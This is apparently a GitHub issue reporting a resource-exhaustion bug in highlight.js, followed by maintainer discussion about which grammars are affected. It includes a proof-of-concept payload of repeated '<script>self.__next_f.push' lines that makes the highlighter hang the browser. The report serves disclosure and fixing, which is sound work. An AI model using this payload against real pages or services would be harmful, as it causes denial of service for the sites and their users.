Resource exhaustion #4261
Description
Describe the issue/behavior that seems buggy
While testing our code, we found that we could make our 'markdown editor' crash.
After some additional research, I found that the highlighting caused it.
I also decided to test the POC on the demo page of highlight.js, and there it also uses a lot of resources.
The browser will eventually show the 'This page isn't responding' pop-up
Sample Code or Instructions to Reproduce
<body>
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
</body>Expected behavior
Page doesn't crash
Additional context
I submitted this to security@highlightjs.org, but didn't get any response.
This can be used to impact the availability of a webpage.
Metadata
Metadata
Assignees
Type
Projects
Milestone
Relationships
Development
No branches or pull requests
Participants
Activity
[-]Client side resource exhausting[/-][+]Resource exhausting [/+]ErazerBrecht commentedon May 14, 2025
If people use this package in their back-ends (NodeJS, pdf generators, ...)
This will cause load on their infrastructure, eventually resulting in a denial of service
[-]Resource exhausting [/-][+]Resource exhaustion[/+]joshgoebel commentedon May 28, 2025
Which grammar choice results in the bad behavior?
sporkmonger commentedon Jun 13, 2025
The original payload won't trigger it for all grammars. I'll send an email to security@highlightjs.org with the list of vulnerable grammars and a minimal reproduction PoC that includes another payload that will trigger the vulnerability for a longer list.